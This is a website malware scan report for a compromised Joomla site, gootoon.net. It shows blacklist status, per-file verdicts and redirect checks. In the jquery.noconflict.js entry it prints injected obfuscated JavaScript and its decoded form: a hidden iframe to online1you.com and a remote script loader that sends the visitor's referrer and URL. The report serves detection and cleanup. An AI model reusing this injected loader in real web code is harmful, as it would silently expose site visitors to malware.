Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gootoon.net
Result: Google has marked this website as suspicious; visiting it may harm your computer.
Details are available here.
Result: Google has marked this website as suspicious; visiting it may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://gootoon.net/ | 200 OK Content-Length: 11071 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.learndream.gootoon.net <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="th-th" lang="th-th" > <head> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="joomla, ...[4051 bytes skipped]... | ||
http://gootoon.net/media/system/js/caption.js | 200 OK Content-Length: 3549 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antivirus engines (see below). The excerpt shows only the beginning of the file, which reads as ordinary caption-handling code; the part that triggered the detections is presumably further into the file and is not shown here.
Excerpt (truncated): var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align =
Antivirus reports:
| ||
http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js | 200 OK Content-Length: 78601 Content-Type: text/javascript | clean |
http://gootoon.net/modules/mod_ariimageslider/mod_ariimageslider/js/jquery.noconflict.js | 200 OK Content-Length: 1667 Content-Type: application/javascript | malicious |
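Malicious code found. Script contains blacklisted domain: online1you.com
Excerpt (truncated): if (typeof(jQuery) != 'undefined') window.jQueryNivoSlider = jQuery.noConflict(); ;var O0l='=sTKpUGchN2cl9FKlBXYjNXZuVHKlRXaydnL05WZtV3YvR2OpADMJhCZslGaDRmblBHch5yTx8kC70FMblyJkFWZodCKl1WYOdWYUlnQzRnbl1WZsVEdldmL05WZtV3YvRGI9AyTx8EIyFmdKsTKMJVVuQnbl1Wdj9GZoQnbl52bw12bDlkUVVGZvNmbltyJ9wmc1ZyJrkiclJnclZWZy5CduVWb1N2bkhCduVmbvBXbvNUSSVVZk92YuV2Kn0jZlJnJnsyJr9WPjJ3c0V2Z/8SbvNmL0BXayN2chZXYqJ3b0F2YzVnZi9mLpBXYv8iOwRHdodCI9AyYyNnLwATSKsTKnQHcpJ3YzdCK05WZ ...[1263 bytes skipped]...
Decoded script: var _escape='%3Cscript%3E%20%3Bdocument.write%28%27%3Ciframe%20src%3D%22http%3A//online1you.com/1/search.php%3Fsid%3D1%22%20scrolling%3D%22auto%22%20frameborder%3D%22no%22%20align%3D%22center%22%20height%3D%222%22%20width%3D%222%22%3E%3C/iframe%3E%27%29%3B%0A%3C/script%3E';var I00 = document.createElement('script'); I00.src = 'http://api.obfuscatorjavascript.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var O1O = document.getElementsByTagName('head')[0]; O ...[656 bytes skipped]...
Reading the excerpt: the first statement (the jQuery.noConflict() call) appears to be the file's original content, and the obfuscated string assigned to O0l follows it in the same file. The decoded form holds a URL-encoded document.write() of a 2x2-pixel iframe pointing at online1you.com, and builds a script element whose source is api.obfuscatorjavascript.com with the visitor's referrer and current page URL in the query string; the element is presumably appended to the document head in the skipped part. Comparing the file with a pristine copy from the extension's original package is the reliable way to confirm exactly what was added.
| ||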
http://gootoon.net/modules/mod_ariimageslider/mod_ariimageslider/js/jquery.nivo.slider.js | 200 OK Content-Length: 11155 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antivirus engines (see below). The excerpt is the start of a script packed with a function(p,a,c,k,e,r) packer; packing of this kind is also common in legitimately minified plugins, so the verdict rests on the antivirus detections rather than on anything visible in this excerpt.
Excerpt (truncated): ;eval(function(p,a,c,k,e,r){e=function(c){return(c<62?'':e(parseInt(c/62)))+((c=c%62)<36?c.toString(36):String.fromCharCode(c+29))};if('0'.replace(0,e)==0){while(c--)r[e(c)]=k[c];k=[function(e){return r[e]||e}];e=function(){return'\\w{1,2}'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(7($){6 P=7(A,B){6 C=$.extend({},$.fn.22.2s,B);7 D(a){17 a?a.replace(/ /g,\'%20\'):\'\'};6 E={V:0,14:\'\',1q:0,R:\'\',1r:Y,23:Y,1v:Y,2t:Y};6 F=$(A);F.1g(\'9:1B\',E);F.
Antivirus reports:
| ||
http://gootoon.net/index.php?option=com_content&view=category&id=1&Itemid=2 | 200 OK Content-Length: 14108 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.learndream.gootoon.net <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="th-th" lang="th-th" > <head> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="joomla, ...[4574 bytes skipped]... | ||
http://gootoon.net/index.php?option=com_content&view=section&layout=blog&id=2&Itemid=3 | 200 OK Content-Length: 17976 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.learndream.gootoon.net <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="th-th" lang="th-th" > <head> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="joomla, ...[4314 bytes skipped]... | ||
http://gootoon.net/index.php?option=com_content&view=section&id=4&Itemid=9 | 200 OK Content-Length: 8588 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.learndream.gootoon.net <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="th-th" lang="th-th" > <head> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="joomla, ...[4700 bytes skipped]... | ||
http://gootoon.net/test404page.js | 404 Not Found Content-Length: 481 Content-Type: text/html | clean |
http://gootoon.net/index.php?view=article&catid=2%3Alearning-room&id=6%3Aroom&format=pdf&option=com_content&Itemid=3 | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://gootoon.net/index.php?view=article&catid=2%3Alearning-room&id=6%3Aroom&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=3 | 200 OK Content-Length: 9246 Content-Type: text/html | clean |
http://gootoon.net/index.php?option=com_mailto&tmpl=component&link=61189a30daacdfa08ddd9cdd53cc5336ca6c21ca | 200 OK Content-Length: 2882 Content-Type: text/html | clean |
http://gootoon.net/index.php?option=com_content&view=article&id=13:-qr-code&catid=1:2011-02-02-09-38-42&Itemid=2 | 200 OK Content-Length: 14702 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.learndream.gootoon.net <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="th-th" lang="th-th" > <head> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="joomla, ...[4200 bytes skipped]... | ||
http://gootoon.net/index.php?view=article&catid=1%3A2011-02-02-09-38-42&id=13%3A-qr-code&format=pdf&option=com_content&Itemid=2 | 200 OK Content-Length: 90 Content-Type: text/html | clean |
http://gootoon.net/index.php?view=article&catid=1%3A2011-02-02-09-38-42&id=13%3A-qr-code&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=2 | 200 OK Content-Length: 6678 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gootoon.net
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Thu, 18 Dec 2014 00:25:58 GMT
Pragma: no-cache
Server: nginx/1.6.2
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 18 Dec 2014 00:25:58 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 3a4ce03644125270e0f734bfbffeba92=99uaegqtt466fkkk3e5i733av5; path=/
X-Died: timeout at scan.pm line 1566.
X-Powered-By: PHP/5.3.28
GET / HTTP/1.1
Host: gootoon.net
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Thu, 18 Dec 2014 00:25:58 GMT
Pragma: no-cache
Server: nginx/1.6.2
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 18 Dec 2014 00:25:58 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 3a4ce03644125270e0f734bfbffeba92=99uaegqtt466fkkk3e5i733av5; path=/
X-Died: timeout at scan.pm line 1566.
X-Powered-By: PHP/5.3.28
Second query (visit from search engine):
GET / HTTP/1.1
Host: gootoon.net
Referer: http://www.google.com/search?q=gootoon.net
Result:
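The result is similar to the first query; no suspicious redirects were found. Note that the first response carries the header "X-Died: timeout at scan.pm line 1566.", which looks like it was added by the scanner's own fetch code rather than by the server, so the comparison may rest on a response that was not read to the end.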
GET / HTTP/1.1
Host: gootoon.net
Referer: http://www.google.com/search?q=gootoon.net
Result:
The result is similar to the first query; no suspicious redirects were found.